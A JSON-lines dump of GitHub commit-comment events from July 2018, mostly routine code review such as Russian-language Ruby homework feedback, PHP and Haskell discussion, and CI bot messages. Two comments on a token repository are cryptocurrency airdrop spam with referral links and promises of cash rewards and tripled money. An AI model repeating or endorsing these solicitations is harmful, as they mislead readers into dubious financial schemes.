{"id":"8028170999","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29857511,"position":19,"line":16,"path":"Lesson_2/amount_of_purchases.rb","commit_id":"df58c3d12a0d4cc4099e7978c374046b23bb239e","created_at":"2018-07-27T11:53:18Z","updated_at":"2018-07-27T11:53:18Z","author_association":"NONE","body":"в руби принято при написании хешей оставлять пробел после и перед фигурными скобками, вот так хорошо:\r\n```ruby\r\ngood_hash = { a: 1, b: 2 }\r\n```\r\nа вот так плохо:\r\n```ruby\r\nbad_hash = {a: 1, b: 2}\r\n```"}},"created_at":"2018-07-27T11:53:18Z"}
{"id":"8028174375","type":"CommitCommentEvent","actor":{"login":"JanDC"},"repo":{"name":"JanDC/twig-wrapper"},"payload":{"comment":{"id":29857518,"position":null,"line":null,"path":null,"commit_id":"7d0989f3338f5c89877b6eb7a71a47bd736e1375","created_at":"2018-07-27T11:54:01Z","updated_at":"2018-07-27T11:54:01Z","author_association":"OWNER","body":"Hi @stof ,\r\n\r\nI suppose you're right. The goal of this implementation is to expose all public methods of the twig environment and then call them on the actual environment (without actually wrapping each individual function). \r\nI guess using an interface would be the obvious solution, but there is no interface to the twig environment.\r\n\r\nDo you have any suggestions on how to properly remedy this issue?\r\n"}},"created_at":"2018-07-27T11:54:01Z"}
{"id":"8028182673","type":"CommitCommentEvent","actor":{"login":"ewbankkit"},"repo":{"name":"ewbankkit/kiam"},"payload":{"comment":{"id":29857532,"position":null,"line":null,"path":null,"commit_id":"f1ecf21c8120e1643ffeb140eb4317935535225a","created_at":"2018-07-27T11:56:07Z","updated_at":"2018-07-27T11:56:07Z","author_association":"OWNER","body":"@mhobotpplnet The kiam Helm chart is now in the official Charts repo: https://github.com/helm/charts/tree/master/stable/kiam.\r\nThis fork is out of date 😄."}},"created_at":"2018-07-27T11:56:07Z"}
{"id":"8028188755","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29857550,"position":5,"line":4,"path":"Lesson_2/vowels.rb","commit_id":"df58c3d12a0d4cc4099e7978c374046b23bb239e","created_at":"2018-07-27T11:57:36Z","updated_at":"2018-07-27T11:57:36Z","author_association":"NONE","body":"вот эта переменая не используется, можно удалить эту строку"}},"created_at":"2018-07-27T11:57:36Z"}
{"id":"8028193099","type":"CommitCommentEvent","actor":{"login":"Mo95ze"},"repo":{"name":"jozefizso/mamp"},"payload":{"comment":{"id":29857561,"position":null,"line":null,"path":null,"commit_id":"366531cecfb22d28478756d6c68dac4afad8e06e","created_at":"2018-07-27T11:58:42Z","updated_at":"2018-07-27T11:58:42Z","author_association":"NONE","body":"Hi sir, sir I want to ask you about vhosts script for apach, how to open vhosts script by using command line and how add the hosts to it??"}},"created_at":"2018-07-27T11:58:42Z"}
{"id":"8028195014","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29857566,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-27T11:59:12Z","updated_at":"2018-07-27T11:59:12Z","author_association":"NONE","body":"EthX is a blockchain-powered solution that aims to make it easier for\nmasses to access and adapt the blockchain technology and solutions\nconveniently and use them for their personal and professional growth.\nPlease, if you see this sign up and get up to $250 for referring friends. [\nhttps://ethx.co/u/?ref=SIRAT353093](https://ethx.co/u/?ref=SIRAT353093)\n\n\n🔹 Name : Ethereum X\n\n\n🔹 Symbol : ETHX\n\n\n🔹 Token Reward : 10 ETHX\n\n\n🔹 Total reward in USD : $2.5\n\n\n🔹 Total reward in ETH : 0.00502996 ETH\n\nOn Thursday, July 26, 2018, rjmaan <notifications@github.com> wrote:\n\n> a promising project\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29848775>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am4jXe6OmSmrLfdzpczRCVumQFiV45Q-ks5uKhLdgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-27T11:59:12Z"}
{"id":"8028195788","type":"CommitCommentEvent","actor":{"login":"stof"},"repo":{"name":"JanDC/twig-wrapper"},"payload":{"comment":{"id":29857567,"position":null,"line":null,"path":null,"commit_id":"7d0989f3338f5c89877b6eb7a71a47bd736e1375","created_at":"2018-07-27T11:59:24Z","updated_at":"2018-07-27T11:59:24Z","author_association":"NONE","body":"but that's **not** what you are doing. `__call` is triggered only for undefined methods. All methods defined in the parent class are **not** undefined."}},"created_at":"2018-07-27T11:59:24Z"}
{"id":"8028196287","type":"CommitCommentEvent","actor":{"login":"delawr0190"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":29857569,"position":null,"line":null,"path":null,"commit_id":"f00d069cf3cf623cd2f635b40e3f9dbdd0fe76ee","created_at":"2018-07-27T11:59:31Z","updated_at":"2018-07-27T11:59:31Z","author_association":"CONTRIBUTOR","body":"Hi @harhail666\r\n\r\nYou can find that here #2197"}},"created_at":"2018-07-27T11:59:31Z"}
{"id":"8028196691","type":"CommitCommentEvent","actor":{"login":"kbiernat"},"repo":{"name":"cloud-init/cloud-init"},"payload":{"comment":{"id":29857570,"position":null,"line":null,"path":null,"commit_id":"827b7b903abc07d5fb04591bbae5587e6dc44993","created_at":"2018-07-27T11:59:37Z","updated_at":"2018-07-27T11:59:37Z","author_association":"NONE","body":"Too bad it doesn't work with CentOS7 and xfs as default FS.\r\nhttps://unix.stackexchange.com/questions/294600/i-cant-enable-swap-space-on-centos-7"}},"created_at":"2018-07-27T11:59:37Z"}
{"id":"8028198399","type":"CommitCommentEvent","actor":{"login":"resoai"},"repo":{"name":"resoai/TileBoard"},"payload":{"comment":{"id":29857575,"position":null,"line":null,"path":null,"commit_id":"64969527e7c6c19613ec0fa2ed329ced237baf06","created_at":"2018-07-27T12:00:03Z","updated_at":"2018-07-27T12:00:03Z","author_association":"OWNER","body":"```\r\nvar pageNum = location.search.match(/page=([\\w\\d_-]+)/);\r\npageNum = pageNum ? pageNum[1] : 1;\r\n```"}},"created_at":"2018-07-27T12:00:03Z"}
{"id":"8028198817","type":"CommitCommentEvent","actor":{"login":"zsrkmyn"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29857578,"position":null,"line":null,"path":null,"commit_id":"f05aee0f012779e9f07d10cc3becca7fbd20080b","created_at":"2018-07-27T12:00:10Z","updated_at":"2018-07-27T12:00:10Z","author_association":"MEMBER","body":"It seems you forgot to add it to nvchecker.ini.\r\nUse `pre-commit` git hook please."}},"created_at":"2018-07-27T12:00:10Z"}
{"id":"8028199439","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29857585,"position":16,"line":7,"path":"Lesson_2/vowels.rb","commit_id":"df58c3d12a0d4cc4099e7978c374046b23bb239e","created_at":"2018-07-27T12:00:17Z","updated_at":"2018-07-27T12:00:17Z","author_association":"NONE","body":"с \"инклюд\" уже гораздо лучше\r\nтеперь давай избавимся от \"дорогостоящей\" операции определения индекса\r\nправильней будет вместо `each` воспользоваться вариантом этого метода [`each_with_index`](https://ruby-doc.org/core-2.5.1/Enumerable.html#method-i-each_with_index)\r\nтогда индекс будет сразу присутствовать внутри итератора и не придется его считать каждый раз"}},"created_at":"2018-07-27T12:00:17Z"}
{"id":"8028199561","type":"CommitCommentEvent","actor":{"login":"tuffr5"},"repo":{"name":"tuffr5/grocery"},"payload":{"comment":{"id":29857586,"position":null,"line":null,"path":null,"commit_id":"45a18ec9f5fd68a46570ffd7334029738bc83e00","created_at":"2018-07-27T12:00:19Z","updated_at":"2018-07-27T12:00:19Z","author_association":"OWNER","body":"This way for elongating the connection of kerberos has proved to be useless, you may not dedicate this to you project. THX."}},"created_at":"2018-07-27T12:00:19Z"}
{"id":"8028201421","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857590,"position":24,"line":24,"path":"homework2/days.rb","commit_id":"22556535dc024d88c93f654f43048bca5434add2","created_at":"2018-07-27T12:00:43Z","updated_at":"2018-07-27T12:00:43Z","author_association":"NONE","body":"`но если он делится на 100 без остатка, это не високосный год` - это не отображено в вычислениях"}},"created_at":"2018-07-27T12:00:43Z"}
{"id":"8028201651","type":"CommitCommentEvent","actor":{"login":"tegabitz"},"repo":{"name":"OminiraProtoco/OEN-Token"},"payload":{"comment":{"id":29857591,"position":null,"line":null,"path":null,"commit_id":"60c0a40844b629109c0add3397309658059e11e3","created_at":"2018-07-27T12:00:46Z","updated_at":"2018-07-27T12:00:46Z","author_association":"NONE","body":"Quite solid and functionally well equipped.. well thought out. SMART.  "}},"created_at":"2018-07-27T12:00:46Z"}
{"id":"8028202294","type":"CommitCommentEvent","actor":{"login":"LordVenom"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29857592,"position":null,"line":null,"path":null,"commit_id":"09b29de0ead096e0c5a286e3dfc4d6e9efc0d4db","created_at":"2018-07-27T12:00:56Z","updated_at":"2018-07-27T12:00:56Z","author_association":"COLLABORATOR","body":"Attention y a un bug qui ce produit avec les settings non déclarer dans settings.xml\r\n\r\nADDON.setSetting('ZT',MemorisedHost)\r\n\r\nIl faut declarer la variable dans settings.xml \r\nexemple :\r\n<!-- setting invisible utilise -->\r\n<setting id=\"service_futur\" type=\"text\" label=\"\" default=\"\" visible=\"false\"/>"}},"created_at":"2018-07-27T12:00:56Z"}
{"id":"8028206085","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857599,"position":14,"line":14,"path":"homework2/days.rb","commit_id":"22556535dc024d88c93f654f43048bca5434add2","created_at":"2018-07-27T12:01:52Z","updated_at":"2018-07-27T12:01:52Z","author_association":"NONE","body":"Достаточно одномероного массива для хранения кол-ва дней в месяце, без указания самого месяца."}},"created_at":"2018-07-27T12:01:52Z"}
{"id":"8028206245","type":"CommitCommentEvent","actor":{"login":"SYK2"},"repo":{"name":"xysun/ray-tracing-in-one-weekend-python"},"payload":{"comment":{"id":29857600,"position":null,"line":null,"path":null,"commit_id":"c4a80caefe6fefacb2f1fe73adf57892f51c6a7e","created_at":"2018-07-27T12:01:54Z","updated_at":"2018-07-27T12:01:54Z","author_association":"NONE","body":"Hey I am going through your presentation and am finding some difficulties understanding. What do you mean by:\r\n\r\nhit_sphere(): solve a quadratic function\r\n(P-C) dot (P-C) = R^2, where P(t) = A + B*t\r\n\r\nI thank you already for having all this here, but it would be awesome if you could send some notes you had when you went through your presentation. \r\n"}},"created_at":"2018-07-27T12:01:54Z"}
{"id":"8028213921","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857619,"position":30,"line":30,"path":"homework2/days.rb","commit_id":"22556535dc024d88c93f654f43048bca5434add2","created_at":"2018-07-27T12:03:41Z","updated_at":"2018-07-27T12:03:41Z","author_association":"NONE","body":"ну и когда months у нас будет массивом - можно будет глянуть в сторону методов take/first и sum для массивов. С их помощью можно решить без использования цикла (что считается более \"рубишным\" путем)"}},"created_at":"2018-07-27T12:03:41Z"}
{"id":"8028215852","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29857626,"position":null,"line":null,"path":null,"commit_id":"866eaff548b59c38ea664c21e211f49f05c1db81","created_at":"2018-07-27T12:04:11Z","updated_at":"2018-07-27T12:04:11Z","author_association":"MEMBER","body":"I think this change is not a good idea. If you want to get the \"session link\" (session/index.php) you should have another function.\r\n\r\nThe function api_get_course_url() is to have the *course URL* (course/xxx/index.php) nothing related to \"session/index.php\"\r\n"}},"created_at":"2018-07-27T12:04:11Z"}
{"id":"8028217315","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29857628,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-27T12:04:29Z","updated_at":"2018-07-27T12:04:29Z","author_association":"NONE","body":"$300+ Avinoc Airdrop: https://www.avinoc.com/r/Xa4hvUactw9o Get $300+ for\nsigning up and doing tasks. Get even more tokens by participating in their\nico. Aviation is a trillion dollar industry and your money could more than\ntriple.\n\nOn Friday, July 27, 2018, Sirat Hashimi <siraty69@gmail.com> wrote:\n\n> EthX is a blockchain-powered solution that aims to make it easier for\n> masses to access and adapt the blockchain technology and solutions\n> conveniently and use them for their personal and professional growth.\n> Please, if you see this sign up and get up to $250 for referring friends. [\n> https://ethx.co/u/?ref=SIRAT353093](https://ethx.co/u/?ref=SIRAT353093)\n>\n>\n> 🔹 Name : Ethereum X\n>\n>\n> 🔹 Symbol : ETHX\n>\n>\n> 🔹 Token Reward : 10 ETHX\n>\n>\n> 🔹 Total reward in USD : $2.5\n>\n>\n> 🔹 Total reward in ETH : 0.00502996 ETH\n>\n> On Thursday, July 26, 2018, rjmaan <notifications@github.com> wrote:\n>\n>> a promising project\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29848775>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/Am4jXe6OmSmrLfdzpczRCVumQFiV45Q-ks5uKhLdgaJpZM4VaEAl>\n>> .\n>>\n>\n"}},"created_at":"2018-07-27T12:04:29Z"}
{"id":"8028222038","type":"CommitCommentEvent","actor":{"login":"jedisct1"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29857633,"position":null,"line":null,"path":null,"commit_id":"6bcbad8fcfa4a8bba373d701b82a9bf64eca5594","created_at":"2018-07-27T12:05:37Z","updated_at":"2018-07-27T12:05:37Z","author_association":"NONE","body":"Travis can use any version. Just add something like this to the `.travis.yml` file:\r\n\r\n```yaml\r\nlanguage: go\r\ngo:\r\n- 1.10.2\r\n```"}},"created_at":"2018-07-27T12:05:37Z"}
{"id":"8028223170","type":"CommitCommentEvent","actor":{"login":"sli921"},"repo":{"name":"jenkinsci/publish-over-ssh-plugin"},"payload":{"comment":{"id":29857636,"position":null,"line":null,"path":null,"commit_id":"81e80e924bf447dd785af75d2127b7ff207629e8","created_at":"2018-07-27T12:05:52Z","updated_at":"2018-07-27T12:05:52Z","author_association":"NONE","body":"I've installed this fix but get the error \"There's no @DataBoundConstructor on any constructor of class java.util.ArrayList...\"\r\n\r\nsee my comment on https://wiki.jenkins.io/display/JENKINS/Publish+Over+SSH+Plugin for further informations"}},"created_at":"2018-07-27T12:05:52Z"}
{"id":"8028224579","type":"CommitCommentEvent","actor":{"login":"EvilBeaver"},"repo":{"name":"EvilBeaver/OneScript"},"payload":{"comment":{"id":29857640,"position":104,"line":103,"path":"src/ScriptEngine/Machine/TypeFactory.cs","commit_id":"f9a113adc9488fcca10813123b24ad4b21ddfb83","created_at":"2018-07-27T12:06:11Z","updated_at":"2018-07-27T12:06:11Z","author_association":"OWNER","body":"Дело в том, что результат всего этого кешируется и по-факту данный код вызывается только при первом вызове конструктора. А так, да, спасибо."}},"created_at":"2018-07-27T12:06:11Z"}
{"id":"8028231769","type":"CommitCommentEvent","actor":{"login":"amio"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29857650,"position":null,"line":null,"path":null,"commit_id":"55970a895d56e96871886d73a41e003bc31050be","created_at":"2018-07-27T12:07:51Z","updated_at":"2018-07-27T12:07:51Z","author_association":"OWNER","body":"Oops must be something missing"}},"created_at":"2018-07-27T12:07:51Z"}
{"id":"8028232152","type":"CommitCommentEvent","actor":{"login":"ctrueden"},"repo":{"name":"scenerygraphics/sciview"},"payload":{"comment":{"id":29857651,"position":null,"line":null,"path":null,"commit_id":"cf7fb79e4ff25816281c8f3d45eb776734e066f6","created_at":"2018-07-27T12:07:56Z","updated_at":"2018-07-27T12:07:56Z","author_association":"COLLABORATOR","body":"I really like the scroll bars to easily move objects.  Have you considered using softMin and softMax?"}},"created_at":"2018-07-27T12:07:56Z"}
{"id":"8028233629","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29857654,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-27T12:08:18Z","updated_at":"2018-07-27T12:08:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T12:08:18Z"}
{"id":"8028236497","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857655,"position":4,"line":4,"path":"homework2/fibonacci","commit_id":"feee9ef0d57b128a29035929c02a3486d2f1cf7d","created_at":"2018-07-27T12:09:01Z","updated_at":"2018-07-27T12:09:01Z","author_association":"NONE","body":"Тут чего-то не хватает. end без условия, или блока - вернет синтактическую ошибку"}},"created_at":"2018-07-27T12:09:01Z"}
{"id":"8028237523","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29857658,"position":17,"line":3,"path":"Lesson_2/fibonachi.rb","commit_id":"df58c3d12a0d4cc4099e7978c374046b23bb239e","created_at":"2018-07-27T12:09:15Z","updated_at":"2018-07-27T12:09:15Z","author_association":"NONE","body":"вот эта часть: `|number|` - лишняя, оператор `loop do` не принимает аргументы (ни разу с таким не встречался), да и ты все равно не используешь этот аргумент ))"}},"created_at":"2018-07-27T12:09:15Z"}
{"id":"8028238061","type":"CommitCommentEvent","actor":{"login":"mohitmenghani"},"repo":{"name":"tbarua1/hp"},"payload":{"comment":{"id":29857660,"position":null,"line":null,"path":null,"commit_id":"c6f8061e6f0128c63a37608d7535463586802030","created_at":"2018-07-27T12:09:23Z","updated_at":"2018-07-27T12:09:23Z","author_association":"NONE","body":"python -m nltk.downloader all"}},"created_at":"2018-07-27T12:09:23Z"}
{"id":"8028239297","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29857663,"position":null,"line":null,"path":null,"commit_id":"d494429f64d68c146b04347a32bdeb0e1eb95974","created_at":"2018-07-27T12:09:40Z","updated_at":"2018-07-27T12:09:40Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-58](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-58).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-58-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-27T12:09:40Z"}
{"id":"8028239866","type":"CommitCommentEvent","actor":{"login":"marcuskassick"},"repo":{"name":"marcuskassick/confluencia"},"payload":{"comment":{"id":29857665,"position":null,"line":null,"path":null,"commit_id":"230095fae56ef9379b4eb90313f6326e8a835960","created_at":"2018-07-27T12:09:48Z","updated_at":"2018-07-27T12:09:48Z","author_association":"OWNER","body":"primeiro commit"}},"created_at":"2018-07-27T12:09:48Z"}
{"id":"8028242209","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29857669,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-27T12:10:21Z","updated_at":"2018-07-27T12:10:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T12:10:21Z"}
{"id":"8028242716","type":"CommitCommentEvent","actor":{"login":"slide"},"repo":{"name":"jenkinsci/publish-over-ssh-plugin"},"payload":{"comment":{"id":29857670,"position":null,"line":null,"path":null,"commit_id":"81e80e924bf447dd785af75d2127b7ff207629e8","created_at":"2018-07-27T12:10:27Z","updated_at":"2018-07-27T12:10:27Z","author_association":"MEMBER","body":"You have to provide all of the arguments. User the snippet generator to show you"}},"created_at":"2018-07-27T12:10:27Z"}
{"id":"8028244356","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29857672,"position":17,"line":3,"path":"Lesson_2/fibonachi.rb","commit_id":"df58c3d12a0d4cc4099e7978c374046b23bb239e","created_at":"2018-07-27T12:10:50Z","updated_at":"2018-07-27T12:10:50Z","author_association":"NONE","body":"в остальном решение рабочее, но вместо безусловного цикла `loop` с `break` внутри, лучше использовать цикл `while` с условием\r\nпопробуй переписать то же самое через `while`"}},"created_at":"2018-07-27T12:10:50Z"}
{"id":"8028246179","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857678,"position":null,"line":null,"path":null,"commit_id":"0a00b4d5d282bd2df84b798fb96a0e8805e3ac25","created_at":"2018-07-27T12:11:17Z","updated_at":"2018-07-27T12:11:17Z","author_association":"NONE","body":"Это отлично"}},"created_at":"2018-07-27T12:11:17Z"}
{"id":"8028247259","type":"CommitCommentEvent","actor":{"login":"facundominguez"},"repo":{"name":"yihuang/network-transport-tcp"},"payload":{"comment":{"id":29857681,"position":12,"line":1502,"path":"src/Network/Transport/TCP.hs","commit_id":"356ec481c1388214e7dde13e53da7e3f72379d24","created_at":"2018-07-27T12:11:35Z","updated_at":"2018-07-27T12:11:35Z","author_association":"NONE","body":"No need to lock the remote endpoint while waiting for `resolved`.\r\n\r\nUse `readMVarTimeout` from `findRemoteEndPoint`?\r\n\r\nWho removes the remote endpoint if the connection is never established?"}},"created_at":"2018-07-27T12:11:35Z"}
{"id":"8028252501","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857692,"position":8,"line":8,"path":"homework2/shopping.rb","commit_id":"85ec2f5d989a4ae6a5c3dd8a3b41acddbde41132","created_at":"2018-07-27T12:12:53Z","updated_at":"2018-07-27T12:12:53Z","author_association":"NONE","body":"chomp можно не использовать перед to_i/to_f. Эти методы приведения типов избавляются от невидимого символа новой строки автоматом"}},"created_at":"2018-07-27T12:12:53Z"}
{"id":"8028252810","type":"CommitCommentEvent","actor":{"login":"katrinleinweber"},"repo":{"name":"TIBHannover/BacDiveR"},"payload":{"comment":{"id":29857696,"position":null,"line":null,"path":null,"commit_id":"abc5f8c8fe21ab7c46a6d7acf8be0791eff774b7","created_at":"2018-07-27T12:12:57Z","updated_at":"2018-07-27T12:12:57Z","author_association":"MEMBER","body":"Related to #30."}},"created_at":"2018-07-27T12:12:57Z"}
{"id":"8028253442","type":"CommitCommentEvent","actor":{"login":"svanandkumar"},"repo":{"name":"svanandkumar/hello-world"},"payload":{"comment":{"id":29857700,"position":null,"line":null,"path":null,"commit_id":"cb8ee3a3f680300583f83ddaa96f21d451b48a3c","created_at":"2018-07-27T12:13:07Z","updated_at":"2018-07-27T12:13:07Z","author_association":"OWNER","body":"Test Commit"}},"created_at":"2018-07-27T12:13:07Z"}
{"id":"8028253512","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29857701,"position":15,"line":14,"path":"Lesson_2/month_with_30days.rb","commit_id":"df58c3d12a0d4cc4099e7978c374046b23bb239e","created_at":"2018-07-27T12:13:08Z","updated_at":"2018-07-27T12:13:08Z","author_association":"NONE","body":"здесь и далее везде:\r\nнастрой редактор на отступ ровно в 2 проблела, именно так принято в ruby\r\nпричем, именно пробела, а не таба, т.е. должна быть замена табов на пробелы, т.н. soft tabs\r\nнайди в интернете как сделать soft tabs для твоего редактора\r\n\r\nу тебя в строках 2 - 13 используются \"табы\""}},"created_at":"2018-07-27T12:13:08Z"}
{"id":"8028254443","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29857704,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-27T12:13:22Z","updated_at":"2018-07-27T12:13:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T12:13:22Z"}
{"id":"8028255931","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857708,"position":12,"line":12,"path":"homework2/shopping.rb","commit_id":"85ec2f5d989a4ae6a5c3dd8a3b41acddbde41132","created_at":"2018-07-27T12:13:45Z","updated_at":"2018-07-27T12:13:45Z","author_association":"NONE","body":"Тут лучше использовать новый синтаксис хэшей.\r\n`{ price: price, count: count }`"}},"created_at":"2018-07-27T12:13:45Z"}
{"id":"8028257690","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29857712,"position":15,"line":14,"path":"Lesson_2/month_with_30days.rb","commit_id":"df58c3d12a0d4cc4099e7978c374046b23bb239e","created_at":"2018-07-27T12:14:11Z","updated_at":"2018-07-27T12:14:11Z","author_association":"NONE","body":"постарайся не оставлять пробелы в конце строки\r\nдля большинства редакторов существуют настройки при которых удаление \"trailing white-spaces\" происходит автоматически (например при сохранении файла)\r\nпоищи такую настройку для своего редактора\r\n\r\n(аналогично в строках 2 -13 у тебя пробелы в конце строки)"}},"created_at":"2018-07-27T12:14:11Z"}
{"id":"8028260721","type":"CommitCommentEvent","actor":{"login":"pazsantander"},"repo":{"name":"pazsantander/prueba2"},"payload":{"comment":{"id":29857721,"position":null,"line":null,"path":null,"commit_id":"4aadada512e8fc2085d0045c3be169f762114593","created_at":"2018-07-27T12:14:57Z","updated_at":"2018-07-27T12:14:57Z","author_association":"OWNER","body":"Entrada__eliminar quedó anidado dentro de un div padre menor que el tweet completo. Sólo se borra el texto.\r\n### Arreglar."}},"created_at":"2018-07-27T12:14:57Z"}
{"id":"8028262834","type":"CommitCommentEvent","actor":{"login":"facundominguez"},"repo":{"name":"yihuang/network-transport-tcp"},"payload":{"comment":{"id":29857734,"position":12,"line":1502,"path":"src/Network/Transport/TCP.hs","commit_id":"356ec481c1388214e7dde13e53da7e3f72379d24","created_at":"2018-07-27T12:15:27Z","updated_at":"2018-07-27T12:15:27Z","author_association":"NONE","body":"Also, this doesn't fix the chance of blocking indefinitely on the crossed MVar."}},"created_at":"2018-07-27T12:15:27Z"}
{"id":"8028265409","type":"CommitCommentEvent","actor":{"login":"AlexeyKryuchkov"},"repo":{"name":"AlexeyKryuchkov/168686"},"payload":{"comment":{"id":29857746,"position":null,"line":null,"path":null,"commit_id":"8ac8800f272987fb8ec24cf000021d93bc0500e4","created_at":"2018-07-27T12:16:03Z","updated_at":"2018-07-27T12:16:03Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://ec2-18-184-3-201.eu-central-1.compute.amazonaws.com:8080/ui#review:id=35)"}},"created_at":"2018-07-27T12:16:03Z"}
